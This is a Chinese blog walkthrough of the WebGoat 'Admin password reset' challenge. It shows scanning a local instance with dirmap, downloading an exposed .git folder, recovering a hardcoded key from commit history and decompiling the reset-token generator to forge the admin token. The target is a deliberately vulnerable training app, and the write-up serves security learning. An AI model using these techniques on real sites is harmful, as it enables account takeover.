WebGoat Challenges之Admin password reset

已于 2022-10-12 01:24:08 修改
阅读量1.5k 收藏
点赞数
分类专栏: Web安全 文章标签: git java 经验分享 webgoat web安全
于 2022-10-12 01:14:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26545503/article/details/127273406
版权

前言

先上几个别人写好的通关策略, 几个对照着看基本能通关

思路

先去github上看了下通关思路基本就下面几步

  1. 遍历网站后台目录, 找到.git目录
  2. 访问并下载git.zip文件
  3. 通过.git历史提交记录还原源码并分析
  4. 找到正确的key并生成重置链接的地址
    在这里插入图片描述

过程

题目让重置admin管理员的密码, 先填个aaaaaa@webgoat.com的地址测试下, 点击Reset Password按钮会往webwolf发一封邮件

webwolf收到邮件后查看重置链接
在这里插入图片描述大概能推测出需要发邮件给 admin@webgoat.com 并且webwolf要能收到admin的重置密码邮件或者推测出admin的reset-password后面那串token


前面的大佬分析网页源码的时候直接发现了题目给的提示

<!--
** Revision history (automatically added by: /challenge/7/.git/hooks)2e29cacb85ce5066b8d011bb9769b666812b2fd9 Updated copyright to 2017ac937c7aab89e042ca32efeb00d4ca08a95b50d6 Removed hardcoded keyf94008f801fceb8833a30fe56a8b26976347edcf First version of WebGoat Cloud website
-->

在这里插入图片描述访问一下这个代码仓库看有没有有用的东西,访问地址:localhost:8080/WebGoat/challenge/7/.git/hooks 提示报错, 嗯… 这就是原题目作者说的git, 可惜找不到
在这里插入图片描述

扫描web目录

这时候使用dirmap扫描下web目录, 安装命令如下

git clone https://github.com/H4ckForJob/dirmap.git && cd dirmap && python3 -m pip install -r requirement.txt

安装完成后修改代码路径下的dirmap.conf 设置下conf.request_header_cookie 参数, 该参数对应访问请求时用的cookie, 可以通过抓包获取
例如:

conf.request_header_cookie = "JSESSIONID=827E4428F2772788D71064C02BCE1405; WEBWOLFSESSION=9DB61B1E0928434835C82F4607D9A244"

最后 执行 python3 dirmap.py -i http://localhost:8080/WebGoat/challenge/7 -lcf 扫描下web目录会获取到.git的路径, 如下

	python3 dirmap.py -i http://localhost:8080/WebGoat/challenge/7  -lcf
    [*] Use crawl mode
    [200][application/octet-stream][28.21kb] http://localhost:8080/WebGoat/challenge/7/.git/                                                                                      
    [200][application/octet-stream][28.21kb] http://localhost:8080/WebGoat/challenge/7/.git

output目录下也能找到扫描报告


获取git文件

访问http://localhost:8080/WebGoat/challenge/7/.git 下载 .git
在这里插入图片描述下载的文件直接打开会无法识别, 可以通过ultraledit等十六进制工具打开文件,可以看到二进制的信息头, 再通过二进制头识别文件类型, 504B03 对应zip压缩包格式文件
在这里插入图片描述
附:常见文件的文件头标识 原文: https://my.oschina.net/yagerfgcs/blog/701021

255044 PDF 
526563 EML 
D0CF11 PPT 
4D5AEE COM 
E93B03 COM 
4D5A90 EXE 
424D3E BMP 
49492A TIF 
384250 PSD 
C5D0D3 EPS 
0A0501 PCS 
89504E PNG 
060500 RAW 
000002 TGA 
60EA27 ARJ 
526172 RAR 
504B03 ZIP 
495363 CAB 
1F9D8C Z 
524946 WAV 
435753 SWF 
3026B2 WMV 
3026B2 WMA 
2E524D RM 
00000F MOV 
000077 MOV 
000001 MPA 
FFFB50 MP3 
234558 m3u 
3C2144 HTM 
FFFE3C XSL 
3C3F78 XML 
3C3F78 MSC 
4C0000 LNK 
495453 CHM 
805343 scm 
D0CF11 XLS 
31BE00 WRI 
00FFFF MDF 
4D4544 MDS 
5B436C CCD 
00FFFF IMG 
FFFFFF SUB 
17A150 PCB 
2A5052 ECO 
526563 PPC 
000100 DDB 
42494C LDB 
2A7665 SCH 
2A2420 LIB 
434841 FNT 
7B5C72 RTF 
7B5072 GTD 
234445 PRG 
000007 PJT 
202020 BAS 
000002 TAG 
4D5A90 dll 
4D5A90 OCX 
4D5A50 DPL 
3F5F03 HLP 
4D5A90 OLB 
4D5A90 IMM 
4D5A90 IME 
3F5F03 LHP 
C22020 NLS 
5B5769 CPX 
4D5A16 DRV 
5B4144 PBK 
24536F PLL 
4E4553 NES 
87F53E GBC 
00FFFF SMD 
584245 XBE 
005001 XMV 
000100 TTF 
484802 PDG 
000100 TST
414331 dwg 
D0CF11 max

# 另外还有一些重要的文件,没有固定的文件头,如下: 

TXT 没固定文件头定义 
TMP 没固定文件头定义 
INI 没固定文件头定义 
BIN 没固定文件头定义 
DBF 没固定文件头定义 
C 没没固定文件头定义 
CPP 没固定文件头定义 
H 没固定文件头定义 
BAT 没固定文件头定义 

# 还有一些不同的文件有相同的文件头,最典型的就是下面: 

4D5A90 EXE 
4D5A90 dll 
4D5A90 OCX 
4D5A90 OLB 
4D5A90 IMM 
4D5A90 IME

还原代码

解压后会生成一个.git隐藏文件夹,这个就是git代码库了,可以通过它来还原代码对象
执行git status 发现一些文件被删除了, 主要是java编译后生成的class文件

git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        deleted:    Challenge7.html
        deleted:    Challenge_7.adoc
        deleted:    MD5$1.class
        deleted:    MD5$MD5State.class
        deleted:    MD5.class
        deleted:    PasswordResetLink.class

执行git reset --hard HEAD还原代码文件, 之后被删除的文件就还原回来了
之后通过IDEA或者jd-gui 可以直接反编译PasswordResetLink.class 推测代码逻辑, 反编译后代码如下

import java.util.Random;

public class PasswordResetLink {
    public PasswordResetLink() {
    }

    public String createPasswordReset(String var1, String var2) {
        Random var3 = new Random();
        if (var1.equalsIgnoreCase("admin")) {
            var3.setSeed((long)var2.length());
        }

        return scramble(var3, scramble(var3, scramble(var3, MD5.getHashString(var1))));
    }

    public static String scramble(Random var0, String var1) {
        char[] var2 = var1.toCharArray();

        for(int var3 = 0; var3 < var2.length; ++var3) {
            int var4 = var0.nextInt(var2.length);
            char var5 = var2[var3];
            var2[var3] = var2[var4];
            var2[var4] = var5;
        }

        return new String(var2);
    }

    public static void main(String[] var0) {
        if (var0 == null || var0.length != 2) {
            System.out.println("Need a username and key");
            System.exit(1);
        }

        String var1 = var0[0];
        String var2 = var0[1];
        System.out.println("Generation password reset link for " + var1);
        System.out.println("Created password reset link: " + (new PasswordResetLink()).createPasswordReset(var1, var2));
    }
}

需要两个参数, 第一个参数是用户名第二个参数是key
分析源代码org/owasp/webgoat/challenges/challenge7/Assignment7.java 发现用的key是webgoat
在这里插入图片描述

回到之前还原代码的那个目录, 安装准备好java的jdk环境后 在命令框中执行java PasswordResetLink admin webgoat, 然后就能生成token了

    java PasswordResetLink admin webgoat             

    Generation password reset link for admin
    Created password reset link: a081235eff82092a319374c24aaa7574

但是a081235eff82092a319374c24aaa7574这个token是个错误的token,
访问 localhost:8080/WebGoat/challenge/7/reset-password/a081235eff82092a319374c24aaa7574 还是报错
在这里插入图片描述

分析WebGoat的代码发现正确的token是375afe1104f4a487a73823c50a9292a2 这是为啥呢??? 一定是打开的姿势不对
在这里插入图片描述

找到key

偶然间重新回到还原class文件的那个地方执行git log查看提交记录发现有个 Removed hardcoded key的提交信息,突然就找到了新大陆了, 这不就是key不对嘛😂

  git log
  commit 2e29cacb85ce5066b8d011bb9769b666812b2fd9 (HEAD -> master)
  Author: Nanne Baars <nanne.baars@owasp.org>
  Date:   Thu Aug 17 06:41:32 2017 +0200

      Updated copyright to 2017

  commit ac937c7aab89e042ca32efeb00d4ca08a95b50d6
  Author: Nanne Baars <nanne.baars@owasp.org>
  Date:   Thu Aug 17 06:41:09 2017 +0200

      Removed hardcoded key

  commit f94008f801fceb8833a30fe56a8b26976347edcf
  Author: Nanne Baars <nanne.baars@owasp.org>
  Date:   Thu Aug 17 06:40:04 2017 +0200

执行git checkout f94008f801fceb8833a30fe56a8b26976347edcf 把代码还原到包含key的那个版本, 再执行git status发现PasswordResetLink.class被修改过

git status
On branch master
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   Challenge7.html
        modified:   PasswordResetLink.class

用IDEA反编译后发现了key是!!keykeykey!!
在这里插入图片描述执行java PasswordResetLink admin 重新生成token, 注意下自己PasswordResetLink.class用的是哪个版本如果不包含key的话就执行java PasswordResetLink admin !!keykeykey!!

 java PasswordResetLink admin 
 Generation password reset link for admin
Created password reset link: 375afe1104f4a487a73823c50a9292a2

访问 http://localhost:8080/WebGoat/challenge/7/reset-password/375afe1104f4a487a73823c50a9292a2
得到flag 00a2ee26-e759-4e1a-9ea3-f9481a0b906f在这里插入图片描述

kainx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoat8 M17 Password Reset 密码重置 答案、思路、题解
伊维泽诺流浪记
03-09 2358
这部分相比前面JWT要简单很多。 题目2:Email functionality with WebWolf 步入正题,练习题2,点击输入框下面的“Forgot your password?”,然后发一封邮件到 {你的WebGoat用户名}@webgoat.org ,这个带密码的邮件会在Webwolf中被收到,密码就是用户名倒过来。直接用密码登录即可。 题目4:Security...
使用IDEA启动WebGoat方法步骤
09-27
使用IDEA启动WebGoat方法步骤+源码; 1、启动请参考:使用IDEA启动WebGoat方法步骤.docx 2、访问地址: WebGoat will be located at: http://localhost:8080/WebGoat WebWolf will be located at: ...
WebGoat (A2) Broken Authentication -- Password reset (密码重置)
箭雨镜屋
03-10 2312
第2页 这一页就是试试webwolf好不好使 webwolf从这里下载:https://github.com/WebGoat/WebGoat/releases 如果下载很慢或者失败的话,可以在webwolf-8.1.0.jar文件上右键复制链接,然后复制到这个网站下载:https://d.serctl.com/ webwolf v8.1.0应该和webgoat v8.1.0一样,也要java 11. 打开的命令是: java -jar webwolf-8.1.0.jar --server.ad
WebGoat Challenges -- Without password
箭雨镜屋
06-21 874
任务:以用户名L
Reset Django admin password
Frank_Good的专栏
01-26 391
1. open SQLite db to find the user_name in auth_user table. 2. python manage.py changepassword 3. set a new password
WebGoat Challenges -- Without account
箭雨镜屋
06-21 617
学到了学到了,又是学到了的一天 任务:打分。 解题步骤: 1、打开burpsuite准备抓包,点一下Average user rating下面的随便哪个小星星。 2、在burpsuite上找到类似这个url(最后是1-5的数字结尾)的报文,这就是打分的时候发送的请求报文。 这个请求报文上面除了cookie,似乎没有关于身份认证的东西了,这个cookie看着是webgoat的全站cookie,和这题也没啥关系。。。一筹莫展 3、无奈之下,看了下本关代码,发现两个华点: (1)代码中注
WebGoat通关详解.zip
最新发布
03-22
1. **SQL注入**:这是最常见的Web漏洞之一,攻击者可以通过输入恶意SQL代码来获取、修改或删除数据库信息。学习者将学会如何识别SQL注入漏洞,以及如何构造有效的注入查询来测试系统安全。 2. **跨站脚本(XSS)**...
webgoat7.1
05-17
WebGoat作为OWASP项目之一,反映了该组织对于教育公众和开发者关于Web安全重要性的承诺。 8. **安全最佳实践**: 通过WebGoat的学习,你将了解到如输入验证、输出编码、安全配置等方面的最佳实践,这些都是防止Web...
webgoat7.war
12-14
webgoat.war靶场war包
1012.Web安全攻防靶场之WebGoat – 3
weixin_30553777的博客
01-15 412
概述 这是 WebGoat 的最后一部分,主要内容是 WebGoat中的Challenge,前面还有 1 和 2。 Challenge Admin lost password 本题目的服务端源代码。 @AssignmentPath("/challenge/1") public class Assignment1 extends AssignmentEndpoint { ...
reset admin password for weblogic v10.3
Wang Xiang's Blog
11-15 526
scenario 1, sometimes we might forget the admin console password. scenario 2, we want to skip to key in username/password while admin console startup go to /user_projects/domains//servers/AdminServer/ to add a folder /security and add a new property boo
WebGoat Challenges之Without account 和 Changing password
Kainx
10-13 605
WebGoat Challenges之Without account 和 Changing password通关思路
WebGoatV8.1(challenges)详细过关教程
weixin_51566481的博客
08-29 978
WebGoat
webgoat
frutrue的博客
07-12 399
webgoat挑战
web安全***靶场之webgoat-1
weixin_33737134的博客
01-17 915
概述(小白入手) webgoat下载WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons(也就是说WebGoat是用来教web应用程序安全的课程). You can install and practice w...
webGoat】Broken Authentication
10-02 1287
【中断的身份验证】
WebGoat SQL盲注 解题思路
Abracadabra的专栏
09-20 4665
WebGoat SQL盲注 解题思路 ★ 题目:SQL Injection (advanced) 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4 题目要求最终以Tom的身份登录到系统中。 LOGIN界面: REGISTER界面: ★ 什么是SQL盲注? 这是我自己的理解,不一定准确...
WebGoat笔记
weixin_30516243的博客
05-12 365
(一)WebGoat部署 安装Tomcat 在官网下载Tomcat 7.0版本的zip包到本地,解压。(用8.0版登陆不上webgoat) 新建两个系统变量CATALINA_BASE和CATALINA_HOME,变量值均为Tomcat的安装目录,例如F:\Webgoat\apache-tomcat-7.0.82。在Path变量中添值%CATALINA_HOME%\lib;%CATALINA_HOM...
WebGoat使用指南
Tasfa的博客
10-06 9167
注意:安装WebGoat默认需要tomcat和java环境的支持 1、下载WebGoat-5.4-OWASP_Standard_Win32.zip(http://code.google.com/p/webgoat/downloads/list), 下载WebGoat-5.4-OWASP_Standard_Win32.zip,自带环境。 2、解压缩到当前文件夹 3、设置浏览器代理127.0.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值